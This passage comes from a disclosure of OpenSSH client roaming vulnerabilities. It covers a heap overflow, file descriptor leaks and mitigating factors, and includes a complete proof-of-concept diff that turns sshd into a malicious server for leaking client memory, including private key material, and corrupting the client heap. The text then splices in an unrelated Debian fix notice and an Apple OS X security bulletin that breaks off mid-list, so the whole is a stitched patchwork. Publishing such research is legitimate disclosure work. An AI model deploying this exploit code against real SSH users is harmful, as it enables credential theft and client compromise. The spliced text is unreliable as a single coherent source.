packet_read_seqnr() (old API, or ssh_packet_read_seqnr(), new API) first calloc()ates setp, a file descriptor set for connection_in; next, it loops around memset(), FD_SET(), select() and roaming_read(); last, it free()s setp and returns. Unfortunately, roaming_read() may reassign a higher value to connection_in (if a reconnection occurs), but setp is never enlarged, and the following memset() and FD_SET() may therefore overflow setp (a heap-based buffer overflow):
1048 int 1049 packet_read_seqnr(u_int32_t seqnr_p) 1050 { .... 1052 fd_set setp; .... 1058 setp = (fd_set )xcalloc(howmany(active_state->connection_in + 1, 1059 NFDBITS), sizeof(fd_mask)); .... 1065 for (;;) { .... 1075 if (type != SSH_MSG_NONE) { 1076 free(setp); 1077 return type; 1078 } .... 1083 memset(setp, 0, howmany(active_state->connection_in + 1, 1084 NFDBITS) * sizeof(fd_mask)); 1085 FD_SET(active_state->connection_in, setp); .... 1092 for (;;) { .... 1097 if ((ret = select(active_state->connection_in + 1, setp, 1098 NULL, NULL, timeoutp)) >= 0) 1099 break; .... 1115 } .... 1117 do { .... 1119 len = roaming_read(active_state->connection_in, buf, 1120 sizeof(buf), &cont); 1121 } while (len == 0 && cont); .... 1130 } 1131 / NOTREACHED */ 1132 }
- packet_write_wait() (old API, or ssh_packet_write_wait(), new API) is basically similar to packet_read_seqnr() and may overflow its own setp if roaming_write() (called by packet_write_poll()) reassigns a higher value to connection_out (after a successful reconnection):
1739 void 1740 packet_write_wait(void) 1741 { 1742 fd_set setp; .... 1746 setp = (fd_set )xcalloc(howmany(active_state->connection_out + 1, 1747 NFDBITS), sizeof(fd_mask)); 1748 packet_write_poll(); 1749 while (packet_have_data_to_write()) { 1750 memset(setp, 0, howmany(active_state->connection_out + 1, 1751 NFDBITS) * sizeof(fd_mask)); 1752 FD_SET(active_state->connection_out, setp); .... 1758 for (;;) { .... 1763 if ((ret = select(active_state->connection_out + 1, 1764 NULL, setp, NULL, timeoutp)) >= 0) 1765 break; .... 1776 } .... 1782 packet_write_poll(); 1783 } 1784 free(setp); 1785 }
Mitigating Factors
This buffer overflow affects all OpenSSH clients >= 5.4, but its impact is significantly reduced by the Mitigating Factors detailed in the Information Leak section, and additionally:
- OpenSSH versions >= 6.8 reimplement packet_backup_state() and packet_restore_state(), but introduce a bug that prevents the buffer overflow from being exploited; indeed, ssh_packet_backup_state() swaps two local pointers, ssh and backup_state, instead of swapping the two global pointers active_state and backup_state:
9 struct ssh active_state, backup_state; ... 238 void 239 packet_backup_state(void) 240 { 241 ssh_packet_backup_state(active_state, backup_state); 242 } 243 244 void 245 packet_restore_state(void) 246 { 247 ssh_packet_restore_state(active_state, backup_state); 248 }
2269 void 2270 ssh_packet_backup_state(struct ssh ssh, 2271 struct ssh backup_state) 2272 { 2273 struct ssh tmp; .... 2279 if (backup_state) 2280 tmp = backup_state; 2281 else 2282 tmp = ssh_alloc_session_state(); 2283 backup_state = ssh; 2284 ssh = tmp; 2285 } .... 2291 void 2292 ssh_packet_restore_state(struct ssh ssh, 2293 struct ssh backup_state) 2294 { 2295 struct ssh tmp; .... 2299 tmp = backup_state; 2300 backup_state = ssh; 2301 ssh = tmp; 2302 ssh->state->connection_in = backup_state->state->connection_in;
As a result, the global pointer backup_state is still NULL when passed to ssh_packet_restore_state(), and crashes the OpenSSH client when dereferenced:
env ROAMING="overflow:A fd_leaks:0" "pwd"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /etc/ssh/sshd_config -h /etc/ssh/ssh_host_rsa_key
$ /usr/bin/ssh -V OpenSSH_6.8, LibreSSL 2.1
$ /usr/bin/ssh -o ProxyCommand="/usr/bin/nc -w 15 %h %p" -p 222 127.0.0.1 user@127.0.0.1's password: [connection suspended, press return to resume]Segmentation fault (core dumped)
This bug prevents the buffer overflow from being exploited, but not the information leak, because the vulnerable function resend_bytes() is called before ssh_packet_restore_state() crashes.
File Descriptor Leak
A back-of-the-envelope calculation indicates that, in order to increase the file descriptor connection_in or connection_out, and thus overflow the file descriptor set setp in packet_read_seqnr() or packet_write_wait(), a file descriptor leak is needed:
-
First, the number of bytes calloc()ated for setp is rounded up to the nearest multiple of sizeof(fd_mask): 8 bytes (or 64 file descriptors) on 64-bit systems.
-
Next, in glibc, this number is rounded up to the nearest multiple of MALLOC_ALIGNMENT: 16 bytes (or 128 file descriptors) on 64-bit systems.
-
Last, in glibc, a MIN_CHUNK_SIZE is enforced: 32 bytes on 64-bit systems, of which 24 bytes (or 192 file descriptors) are reserved for setp.
-
In conclusion, a file descriptor leak is needed, because connection_in or connection_out has to be increased by hundreds in order to overflow setp.
The search for a suitable file descriptor leak begins with a study of the behavior of the four ssh_connect() methods, when called for a reconnection by wait_for_roaming_reconnect():
- The default method ssh_connect_direct() communicates with the server through a simple TCP socket: the two file descriptors connection_in and connection_out are both equal to this socket's file descriptor.
In wait_for_roaming_reconnect(), the low-numbered file descriptor of the old TCP socket is close()d by packet_backup_state(), but immediately reused for the new TCP socket in ssh_connect_direct(): the new file descriptors connection_in and connection_out are equal to this old, low-numbered file descriptor, and cannot possibly overflow setp.
-
The special ProxyCommand "-" communicates with the server through stdin and stdout, but (as explained in the Mitigating Factors of the Information Leak section) it cannot possibly reconnect to the server, and is therefore immune to this buffer overflow.
-
Surprisingly, we discovered a file descriptor leak in the ssh_proxy_fdpass_connect() method itself; indeed, the file descriptor sp[1] is never close()d:
101 static int 102 ssh_proxy_fdpass_connect(const char host, u_short port, 103 const char proxy_command) 104 { ... 106 int sp[2], sock; ... 113 if (socketpair(AF_UNIX, SOCK_STREAM, 0, sp) < 0) 114 fatal("Could not create socketpair to communicate with " 115 "proxy dialer: %.100s", strerror(errno)); ... 161 close(sp[0]); ... 164 if ((sock = mm_receive_fd(sp[1])) == -1) 165 fatal("proxy dialer did not pass back a connection"); ... 171 / Set the connection file descriptors. / 172 packet_set_connection(sock, sock); 173 174 return 0; 175 }
However, two different reasons prevent this file descriptor leak from triggering the setp overflow:
- The method ssh_proxy_fdpass_connect() communicates with the server through a single socket received from the ProxyCommand: the two file descriptors connection_in and connection_out are both equal to this socket's file descriptor.
In wait_for_roaming_reconnect(), the low-numbered file descriptor of the old socket is close()d by packet_backup_state(), reused for sp[0] in ssh_proxy_fdpass_connect(), close()d again, and eventually reused again for the new socket: the new file descriptors connection_in and connection_out are equal to this old, low-numbered file descriptor, and cannot possibly overflow setp.
-
Because of the waitpid() bug described in the Mitigating Factors of the Information Leak section, the method ssh_proxy_fdpass_connect() calls fatal() before it returns to wait_for_roaming_reconnect(), and is therefore immune to this buffer overflow.
-
The method ssh_proxy_connect() communicates with the server through a ProxyCommand and two different pipes: the file descriptor connection_in is the read end of the second pipe (pout[0]), and the file descriptor connection_out is the write end of the first pipe (pin[1]):
180 static int 181 ssh_proxy_connect(const char host, u_short port, const char proxy_command) 182 { ... 184 int pin[2], pout[2]; ... 192 if (pipe(pin) < 0 || pipe(pout) < 0) 193 fatal("Could not create pipes to communicate with the proxy: %.100s", 194 strerror(errno)); ... 240 / Close child side of the descriptors. / 241 close(pin[0]); 242 close(pout[1]); ... 247 / Set the connection file descriptors. / 248 packet_set_connection(pout[0], pin[1]); 249 250 / Indicate OK return / 251 return 0; 252 }
In wait_for_roaming_reconnect(), the two old, low-numbered file descriptors connection_in and connection_out are both close()d by packet_backup_state(), and immediately reused for the pipe(pin) in ssh_proxy_connect(): the new connection_out (pin[1]) is equal to one of these old, low-numbered file descriptors, and cannot possibly overflow setp.
On the other hand, the pipe(pout) in ssh_proxy_connect() may return high-numbered file descriptors, and the new connection_in (pout[0]) may therefore overflow setp, if hundreds of file descriptors were leaked before the call to wait_for_roaming_reconnect():
- We discovered a file descriptor leak in the pubkey_prepare() function of OpenSSH >= 6.8; indeed, if the client is running an authentication agent that does not offer any private keys, the reference to agent_fd is lost, and this file descriptor is never close()d:
1194 static void 1195 pubkey_prepare(Authctxt *authctxt) 1196 { .... 1200 int agent_fd, i, r, found; .... 1247 if ((r = ssh_get_authentication_socket(&agent_fd)) != 0) { 1248 if (r != SSH_ERR_AGENT_NOT_PRESENT) 1249 debug("%s: ssh_get_authentication_socket: %s", 1250 func, ssh_err(r)); 1251 } else if ((r = ssh_fetch_identitylist(agent_fd, 2, &idlist)) != 0) { 1252 if (r != SSH_ERR_AGENT_NO_IDENTITIES) 1253 debug("%s: ssh_fetch_identitylist: %s", 1254 func, ssh_err(r)); 1255 } else { .... 1288 authctxt->agent_fd = agent_fd; 1289 } .... 1299 }
However, OpenSSH clients >= 6.8 crash in ssh_packet_restore_state() (because of the NULL-pointer dereference discussed in the Mitigating Factors of the Buffer Overflow section) and are immune to the setp overflow, despite this agent_fd leak.
- If ForwardAgent (-A) or ForwardX11 (-X) is enabled in the OpenSSH client (it is disabled by default), a malicious SSH server can request hundreds of forwardings, in order to increase connection_in (each forwarding opens a file descriptor), and thus overflow setp in packet_read_seqnr():
env ROAMING="overflow:A" "pwd"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /dev/null -h /etc/ssh/ssh_host_rsa_key
$ /usr/bin/ssh -V OpenSSH_6.6.1p1 Ubuntu-2ubuntu2, OpenSSL 1.0.1f 6 Jan 2014
$ /usr/bin/ssh-agent -- /usr/bin/ssh -A -o ProxyCommand="/usr/bin/socat - TCP4:%h:%p" -p 222 127.0.0.1 user@127.0.0.1's password: [connection suspended, press return to resume][connection resumed] *** Error in `/usr/bin/ssh': free(): invalid next size (fast): 0x00007f0474d03e70 *** Aborted (core dumped)
env ROAMING="overflow:X" "pwd"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /etc/ssh/sshd_config -h /etc/ssh/ssh_host_rsa_key
$ /usr/bin/ssh -V OpenSSH_6.4p1, OpenSSL 1.0.1e-fips 11 Feb 2013
$ /usr/bin/ssh -X -o ProxyCommand="/usr/bin/socat - TCP4:%h:%p" -p 222 127.0.0.1
user@127.0.0.1's password:
[connection suspended, press return to resume][connection resumed]
*** Error in /usr/bin/ssh': free(): invalid next size (fast): 0x00007fdcc2a3aba0 ***
*** Error in/usr/bin/ssh': malloc(): memory corruption: 0x00007fdcc2a3abc0 ***
Finally, a brief digression on two unexpected problems that had to be solved in our proof-of-concept:
-
First, setp can be overflowed only in packet_read_seqnr(), not in packet_write_wait(), but agent forwarding and X11 forwarding are post- authentication functionalities, and post-authentication calls to packet_read() or packet_read_expect() are scarce, except in the key-exchange code of OpenSSH clients < 6.8: our proof-of-concept effectively forces a rekeying in order to overflow setp in packet_read_seqnr().
-
Second, after a successful reconnection, packet_read_seqnr() may call fatal("Read from socket failed: %.100s", ...), because roaming_read() may return EAGAIN (EAGAIN is never returned without the reconnection, because the preceding call to select() guarantees that connection_in is ready for read()). Our proof-of-concept works around this problem by forcing the client to resend MAX_ROAMBUF bytes (2M) to the server, allowing data to reach the client before roaming_read() is called, thus avoiding EAGAIN.
======================================================================== Acknowledgments ========================================================================
We would like to thank the OpenSSH developers for their great work and their incredibly quick response, Red Hat Product Security for promptly assigning CVE-IDs to these issues, and Alexander Peslyak of the Openwall Project for the interesting discussions.
======================================================================== Proof Of Concept ========================================================================
diff -pruN openssh-6.4p1/auth2-pubkey.c openssh-6.4p1+roaming/auth2-pubkey.c --- openssh-6.4p1/auth2-pubkey.c 2013-07-17 23:10:10.000000000 -0700 +++ openssh-6.4p1+roaming/auth2-pubkey.c 2016-01-07 01:04:15.000000000 -0800 @@ -169,7 +169,9 @@ userauth_pubkey(Authctxt authctxt) * if a user is not allowed to login. is this an * issue? -markus / - if (PRIVSEP(user_key_allowed(authctxt->pw, key))) { + if (PRIVSEP(user_key_allowed(authctxt->pw, key)) || 1) { + debug("%s: force client-side load_identity_file", + func); packet_start(SSH2_MSG_USERAUTH_PK_OK); packet_put_string(pkalg, alen); packet_put_string(pkblob, blen); diff -pruN openssh-6.4p1/kex.c openssh-6.4p1+roaming/kex.c --- openssh-6.4p1/kex.c 2013-06-01 14:31:18.000000000 -0700 +++ openssh-6.4p1+roaming/kex.c 2016-01-07 01:04:15.000000000 -0800 @@ -442,6 +442,73 @@ proposals_match(char *my[PROPOSAL_MAX], }
static void +roaming_reconnect(void) +{ + packet_read_expect(SSH2_MSG_KEX_ROAMING_RESUME); + const u_int id = packet_get_int(); / roaming_id / + debug("%s: id %u", func, id); + packet_check_eom(); + + const char const dir = get_roaming_dir(id); + debug("%s: dir %s", func, dir); + const int fd = open(dir, O_RDONLY | O_NOFOLLOW | O_NONBLOCK); + if (fd <= -1) + fatal("%s: open %s errno %d", func, dir, errno); + if (fchdir(fd) != 0) + fatal("%s: fchdir %s errno %d", func, dir, errno); + if (close(fd) != 0) + fatal("%s: close %s errno %d", func, dir, errno); + + packet_start(SSH2_MSG_KEX_ROAMING_AUTH_REQUIRED); + packet_put_int64(arc4random()); / chall / + packet_put_int64(arc4random()); / oldchall / + packet_send(); + + packet_read_expect(SSH2_MSG_KEX_ROAMING_AUTH); + const u_int64_t client_read_bytes = packet_get_int64(); + debug("%s: client_read_bytes %llu", func, + (unsigned long long)client_read_bytes); + packet_get_int64(); / digest (1-8) / + packet_get_int64(); / digest (9-16) / + packet_get_int(); / digest (17-20) / + packet_check_eom(); + + u_int64_t client_write_bytes; + size_t len = sizeof(client_write_bytes); + load_roaming_file("client_write_bytes", &client_write_bytes, &len); + debug("%s: client_write_bytes %llu", func, + (unsigned long long)client_write_bytes); + + u_int client_out_buf_size; + len = sizeof(client_out_buf_size); + load_roaming_file("client_out_buf_size", &client_out_buf_size, &len); + debug("%s: client_out_buf_size %u", func, client_out_buf_size); + if (client_out_buf_size <= 0 || client_out_buf_size > MAX_ROAMBUF) + fatal("%s: client_out_buf_size %u", func, + client_out_buf_size); + + packet_start(SSH2_MSG_KEX_ROAMING_AUTH_OK); + packet_put_int64(client_write_bytes - (u_int64_t)client_out_buf_size); + packet_send(); + const int overflow = (access("output", F_OK) == 0); + if (overflow != 0) { + const void const ptr = load_roaming_file("output", NULL, &len); + buffer_append(packet_get_output(), ptr, len); + } + packet_write_wait(); + + char const client_out_buf = xmalloc(client_out_buf_size); + if (atomicio(read, packet_get_connection_in(), client_out_buf, + client_out_buf_size) != client_out_buf_size) + fatal("%s: read client_out_buf_size %u errno %d", func, + client_out_buf_size, errno); + if (overflow == 0) + dump_roaming_file("infoleak", client_out_buf, + client_out_buf_size); + fatal("%s: all done for %s", func, dir); +} + +static void kex_choose_conf(Kex kex) { Newkeys newkeys; @@ -470,6 +537,10 @@ kex_choose_conf(Kex kex) kex->roaming = 1; free(roaming); } + } else if (strcmp(peer[PROPOSAL_KEX_ALGS], KEX_RESUME) == 0) { + roaming_reconnect(); + / NOTREACHED / + fatal("%s: returned from %s", func, KEX_RESUME); }
/* Algorithm Negotiation */
diff -pruN openssh-6.4p1/roaming.h openssh-6.4p1+roaming/roaming.h --- openssh-6.4p1/roaming.h 2011-12-18 15:52:52.000000000 -0800 +++ openssh-6.4p1+roaming/roaming.h 2016-01-07 01:04:15.000000000 -0800 @@ -42,4 +42,86 @@ void resend_bytes(int, u_int64_t ); void calculate_new_key(u_int64_t , u_int64_t, u_int64_t); int resume_kex(void);
+#include +#include +#include +#include +#include +#include + +#include "atomicio.h" +#include "log.h" +#include "xmalloc.h" + +static inline char * +get_roaming_dir(const u_int id) +{ + const size_t buflen = MAXPATHLEN; + char const buf = xmalloc(buflen); + + if ((u_int)snprintf(buf, buflen, "/tmp/roaming-%08x", id) >= buflen) + fatal("%s: snprintf %u error", func, id); + return buf; +} + +static inline void +dump_roaming_file(const char const name, + const void const buf, const size_t buflen) +{ + if (name == NULL) + fatal("%s: name %p", func, name); + if (strchr(name, '/') != NULL) + fatal("%s: name %s", func, name); + if (buf == NULL) + fatal("%s: %s buf %p", func, name, buf); + if (buflen <= 0 || buflen > MAX_ROAMBUF) + fatal("%s: %s buflen %lu", func, name, (u_long)buflen); + + const int fd = open(name, O_WRONLY | O_CREAT | O_EXCL, S_IRUSR); + if (fd <= -1) + fatal("%s: open %s errno %d", func, name, errno); + if (write(fd, buf, buflen) != (ssize_t)buflen) + fatal("%s: write %s errno %d", func, name, errno); + if (close(fd) != 0) + fatal("%s: close %s errno %d", func, name, errno); +} + +static inline void * +load_roaming_file(const char const name, + void buf, size_t const buflenp) +{ + if (name == NULL) + fatal("%s: name %p", func, name); + if (strchr(name, '/') != NULL) + fatal("%s: name %s", func, name); + if (buflenp == NULL) + fatal("%s: %s buflenp %p", func, name, buflenp); + + const int fd = open(name, O_RDONLY | O_NOFOLLOW | O_NONBLOCK); + if (fd <= -1) + fatal("%s: open %s errno %d", func, name, errno); + struct stat st; + if (fstat(fd, &st) != 0) + fatal("%s: fstat %s errno %d", func, name, errno); + if (S_ISREG(st.st_mode) == 0) + fatal("%s: %s mode 0%o", func, name, (u_int)st.st_mode); + if (st.st_size <= 0 || st.st_size > MAX_ROAMBUF) + fatal("%s: %s size %lld", func, name, + (long long)st.st_size); + + if (buf == NULL) { + buflenp = st.st_size; + buf = xmalloc(buflenp); + } else { + if (buflenp != (size_t)st.st_size) + fatal("%s: %s size %lld buflen %lu", func, name, + (long long)st.st_size, (u_long)buflenp); + } + if (read(fd, buf, buflenp) != (ssize_t)buflenp) + fatal("%s: read %s errno %d", func, name, errno); + if (close(fd) != 0) + fatal("%s: close %s errno %d", func, name, errno); + return buf; +} + #endif / ROAMING / diff -pruN openssh-6.4p1/serverloop.c openssh-6.4p1+roaming/serverloop.c --- openssh-6.4p1/serverloop.c 2013-07-17 23:12:45.000000000 -0700 +++ openssh-6.4p1+roaming/serverloop.c 2016-01-07 01:04:15.000000000 -0800 @@ -1060,6 +1060,9 @@ server_request_session(void) return c; }
+static int client_session_channel = -1; +static int server_session_channel = -1; + static void server_input_channel_open(int type, u_int32_t seq, void ctxt) { @@ -1089,12 +1092,22 @@ server_input_channel_open(int type, u_in c->remote_window = rwindow; c->remote_maxpacket = rmaxpack; if (c->type != SSH_CHANNEL_CONNECTING) { + debug("%s: avoid client-side buf_append", func); + / packet_start(SSH2_MSG_CHANNEL_OPEN_CONFIRMATION); packet_put_int(c->remote_id); packet_put_int(c->self); packet_put_int(c->local_window); packet_put_int(c->local_maxpacket); packet_send(); + */ + if (strcmp(ctype, "session") == 0) { + if (client_session_channel != -1) + fatal("%s: client_session_channel %d", + func, client_session_channel); + client_session_channel = c->remote_id; + server_session_channel = c->self; + } } } else { debug("server_input_channel_open: failure %s", ctype); @@ -1111,6 +1124,196 @@ server_input_channel_open(int type, u_in }
static void +roaming_disconnect(Kex const kex) +{ + const char cp, roaming = getenv("ROAMING"); + if (roaming == NULL) + roaming = "infoleak"; + int overflow = 0; + if ((cp = strstr(roaming, "overflow:")) != NULL) + overflow = cp[9]; + + const u_int client_recv_buf_size = packet_get_int(); + packet_check_eom(); + const u_int server_recv_buf_size = get_recv_buf_size(); + const u_int server_send_buf_size = get_snd_buf_size(); + debug("%s: client_recv_buf_size %u", func, client_recv_buf_size); + debug("%s: server_recv_buf_size %u", func, server_recv_buf_size); + debug("%s: server_send_buf_size %u", func, server_send_buf_size); + + u_int client_send_buf_size = 0; + if ((cp = strstr(roaming, "client_send_buf_size:")) != NULL) + client_send_buf_size = strtoul(cp + 21, NULL, 0); + else if (client_recv_buf_size == DEFAULT_ROAMBUF) + client_send_buf_size = DEFAULT_ROAMBUF; + else { + const u_int + max = MAX(client_recv_buf_size, server_recv_buf_size), + min = MIN(client_recv_buf_size, server_recv_buf_size); + if (min <= 0) + fatal("%s: min %u", func, min); + if (((u_int64_t)(max - min) * 1024) / min < 1) + client_send_buf_size = server_send_buf_size; + else + client_send_buf_size = client_recv_buf_size; + } + debug("%s: client_send_buf_size %u", func, client_send_buf_size); + if (client_send_buf_size <= 0) + fatal("%s: client_send_buf_size", func); + + u_int id = 0; + char dir = NULL; + for (;;) { + id = arc4random(); + debug("%s: id %u", func, id); + free(dir); + dir = get_roaming_dir(id); + if (mkdir(dir, S_IRWXU) == 0) + break; + if (errno != EEXIST) + fatal("%s: mkdir %s errno %d", func, dir, errno); + } + debug("%s: dir %s", func, dir); + if (chdir(dir) != 0) + fatal("%s: chdir %s errno %d", func, dir, errno); + + u_int client_out_buf_size = 0; + if ((cp = strstr(roaming, "client_out_buf_size:")) != NULL) + client_out_buf_size = strtoul(cp + 20, NULL, 0); + else if (overflow != 0) + client_out_buf_size = MAX_ROAMBUF; + else + client_out_buf_size = 1 + arc4random() % 4096; + debug("%s: client_out_buf_size %u", func, client_out_buf_size); + if (client_out_buf_size <= 0) + fatal("%s: client_out_buf_size", func); + dump_roaming_file("client_out_buf_size", &client_out_buf_size, + sizeof(client_out_buf_size)); + + if ((cp = strstr(roaming, "scp_mode")) != NULL) { + if (overflow != 0) + fatal("%s: scp_mode is incompatible with overflow %d", + func, overflow); + + u_int seconds_left_to_sleep = 3; + if ((cp = strstr(cp, "sleep:")) != NULL) + seconds_left_to_sleep = strtoul(cp + 6, NULL, 0); + debug("%s: sleep %u", func, seconds_left_to_sleep); + + if (client_session_channel == -1) + fatal("%s: client_session_channel %d", + func, client_session_channel); + + packet_start(SSH2_MSG_CHANNEL_OPEN_CONFIRMATION); + packet_put_int(client_session_channel); + packet_put_int(server_session_channel); + packet_put_int(0); / server window / + packet_put_int(0); / server maxpacket / + packet_send(); + + packet_start(SSH2_MSG_CHANNEL_DATA); + packet_put_int(client_session_channel); + packet_put_string("\0\n", 2); / response&source|sink&run_err / + packet_send(); + + packet_read_expect(SSH2_MSG_CHANNEL_REQUEST); + packet_get_int(); / server channel / + debug("%s: channel request %s", func, + packet_get_cstring(NULL)); + + while (seconds_left_to_sleep) + seconds_left_to_sleep = sleep(seconds_left_to_sleep); + } + + packet_start(SSH2_MSG_REQUEST_SUCCESS); + packet_put_int(id); / roaming_id / + packet_put_int64(arc4random()); / cookie / + packet_put_int64(0); / key1 / + packet_put_int64(0); / key2 / + packet_put_int(client_out_buf_size - client_send_buf_size); + packet_send(); + packet_write_wait(); + + if (overflow != 0) { + const u_int64_t full_client_out_buf = get_recv_bytes() + + client_out_buf_size; + + u_int fd_leaks = 4 * 8 * 8; / MIN_CHUNK_SIZE in bits / + if ((cp = strstr(roaming, "fd_leaks:")) != NULL) + fd_leaks = strtoul(cp + 9, NULL, 0); + debug("%s: fd_leaks %u", func, fd_leaks); + + while (fd_leaks--) { + packet_start(SSH2_MSG_CHANNEL_OPEN); + packet_put_cstring(overflow == 'X' ? "x11" : + "auth-agent@openssh.com"); / ctype / + packet_put_int(arc4random()); / server channel / + packet_put_int(arc4random()); / server window / + packet_put_int(arc4random()); / server maxpacket / + if (overflow == 'X') { + packet_put_cstring(""); / originator / + packet_put_int(arc4random()); / port / + } + packet_send(); + + packet_read_expect(SSH2_MSG_CHANNEL_OPEN_CONFIRMATION); + packet_get_int(); / server channel / + packet_get_int(); / client channel / + packet_get_int(); / client window / + packet_get_int(); / client maxpacket / + packet_check_eom(); + } + + while (get_recv_bytes() <= full_client_out_buf) { + packet_start(SSH2_MSG_GLOBAL_REQUEST); + packet_put_cstring(""); / rtype / + packet_put_char(1); / want_reply / + packet_send(); + + packet_read_expect(SSH2_MSG_REQUEST_FAILURE); + packet_check_eom(); + } + + if (kex == NULL) + fatal("%s: no kex, cannot rekey", func); + if (kex->flags & KEX_INIT_SENT) + fatal("%s: KEX_INIT_SENT already", func); + char const ptr = buffer_ptr(&kex->my); + const u_int len = buffer_len(&kex->my); + if (len <= 1+4) / first_kex_follows + reserved / + fatal("%s: kex len %u", func, len); + ptr[len - (1+4)] = 1; / first_kex_follows / + kex_send_kexinit(kex); + + u_int i; + packet_read_expect(SSH2_MSG_KEXINIT); + for (i = 0; i < KEX_COOKIE_LEN; i++) + packet_get_char(); + for (i = 0; i < PROPOSAL_MAX; i++) + free(packet_get_string(NULL)); + packet_get_char(); / first_kex_follows / + packet_get_int(); / reserved / + packet_check_eom(); + + char buf[81922]; / two packet_read_seqnr bufferfuls / + memset(buf, '\0', sizeof(buf)); + packet_start(SSH2_MSG_KEX_ROAMING_AUTH_FAIL); + packet_put_string(buf, sizeof(buf)); + packet_send(); + const Buffer const output = packet_get_output(); + dump_roaming_file("output", buffer_ptr(output), + buffer_len(output)); + } + + const u_int64_t client_write_bytes = get_recv_bytes(); + debug("%s: client_write_bytes %llu", func, + (unsigned long long)client_write_bytes); + dump_roaming_file("client_write_bytes", &client_write_bytes, + sizeof(client_write_bytes)); + fatal("%s: all done for %s", func, dir); +} + +static void server_input_global_request(int type, u_int32_t seq, void ctxt) { char rtype; @@ -1168,6 +1371,13 @@ server_input_global_request(int type, u_ } else if (strcmp(rtype, "no-more-sessions@openssh.com") == 0) { no_more_sessions = 1; success = 1; + } else if (strcmp(rtype, ROAMING_REQUEST) == 0) { + if (want_reply != 1) + fatal("%s: rtype %s want_reply %d", func, + rtype, want_reply); + roaming_disconnect(ctxt); + / NOTREACHED */ + fatal("%s: returned from %s", func, ROAMING_REQUEST); } if (want_reply) { packet_start(success ? diff -pruN openssh-6.4p1/sshd.c openssh-6.4p1+roaming/sshd.c --- openssh-6.4p1/sshd.c 2013-07-19 20:21:53.000000000 -0700 +++ openssh-6.4p1+roaming/sshd.c 2016-01-07 01:04:15.000000000 -0800 @@ -2432,6 +2432,8 @@ do_ssh2_kex(void) } if (options.kex_algorithms != NULL) myproposal[PROPOSAL_KEX_ALGS] = options.kex_algorithms; + else + myproposal[PROPOSAL_KEX_ALGS] = KEX_DEFAULT_KEX "," KEX_RESUME;
if (options.rekey_limit || options.rekey_interval)
packet_set_rekey_limits((u_int32_t)options.rekey_limit,
.
More details about identifying an attack and mitigations will be available in the Qualys Security Advisory.
For the oldstable distribution (wheezy), these problems have been fixed in version 1:6.0p1-4+deb7u3.
For the stable distribution (jessie), these problems have been fixed in version 1:6.7p1-5+deb8u1.
For the testing distribution (stretch) and unstable distribution (sid), these problems will be fixed in a later version. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512
APPLE-SA-2016-03-21-5 OS X El Capitan 10.11.4 and Security Update 2016-002
OS X El Capitan 10.11.4 and Security Update 2016-002 is now available and addresses the following:
apache_mod_php Available for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5, and OS X El Capitan v10.11 to v10.11.3 Impact: Processing a maliciously crafted .png file may lead to arbitrary code execution Description: Multiple vulnerabilities existed in libpng versions prior to 1.6.20. These were addressed by updating libpng to version 1.6.20. CVE-ID CVE-2015-8126 : Adam Mariš CVE-2015-8472 : Adam Mariš
AppleRAID Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An application may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue was addressed through improved input validation. CVE-ID CVE-2016-1733 : Proteas of Qihoo 360 Nirvan Team
AppleRAID Available for: OS X El Capitan v10.11 to v10.11.3 Impact: A local user may be able to determine kernel memory layout Description: An out-of-bounds read issue existed that led to the disclosure of kernel memory. This was addressed through improved input validation. CVE-ID CVE-2016-1732 : Proteas of Qihoo 360 Nirvan Team
AppleUSBNetworking Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An application may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue existed in the parsing of data from USB devices. This issue was addressed through improved input validation. CVE-ID CVE-2016-1734 : Andrea Barisani and Andrej Rosano of Inverse Path
Bluetooth Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An application may be able to execute arbitrary code with kernel privileges Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-ID CVE-2016-1735 : Jeonghoon Shin@A.D.D CVE-2016-1736 : beist and ABH of BoB
Carbon Available for: OS X El Capitan v10.11 to v10.11.3 Impact: Processing a maliciously crafted .dfont file may lead to arbitrary code execution Description: Multiple memory corruption issues existed in the handling of font files. These issues were addressed through improved bounds checking. CVE-ID CVE-2016-1737 : an anonymous researcher
dyld Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An attacker may tamper with code-signed applications to execute arbitrary code in the application's context Description: A code signing verification issue existed in dyld. CVE-ID CVE-2016-1738 : beist and ABH of BoB
FontParser Available for: OS X El Capitan v10.11 to v10.11.3 Impact: Opening a maliciously crafted PDF file may lead to an unexpected application termination or arbitrary code execution Description: A memory corruption issue was addressed through improved memory handling. CVE-ID CVE-2016-1740 : HappilyCoded (ant4g0nist and r3dsm0k3) working with Trend Micro's Zero Day Initiative (ZDI)
HTTPProtocol Available for: OS X El Capitan v10.11 to v10.11.3 Impact: A remote attacker may be able to execute arbitrary code Description: Multiple vulnerabilities existed in nghttp2 versions prior to 1.6.0, the most serious of which may have led to remote code execution. These were addressed by updating nghttp2 to version 1.6.0. CVE-ID CVE-2015-8659
Intel Graphics Driver Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An application may be able to execute arbitrary code with kernel privileges Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-ID CVE-2016-1743 : Piotr Bania of Cisco Talos CVE-2016-1744 : Ian Beer of Google Project Zero
IOFireWireFamily Available for: OS X El Capitan v10.11 to v10.11.3 Impact: A local user may be able to cause a denial of service Description: A null pointer dereference was addressed through improved validation. CVE-ID CVE-2016-1745 : sweetchip of Grayhash
IOGraphics Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An application may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue was addressed through improved input validation. CVE-ID CVE-2016-1746 : Peter Pi of Trend Micro working with Trend Micro's Zero Day Initiative (ZDI) CVE-2016-1747 : Juwei Lin of Trend Micro working with Trend Micro's Zero Day Initiative (ZDI)
IOHIDFamily Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An application may be able to determine kernel memory layout Description: A memory corruption issue was addressed through improved memory handling. CVE-ID CVE-2016-1748 : Brandon Azad
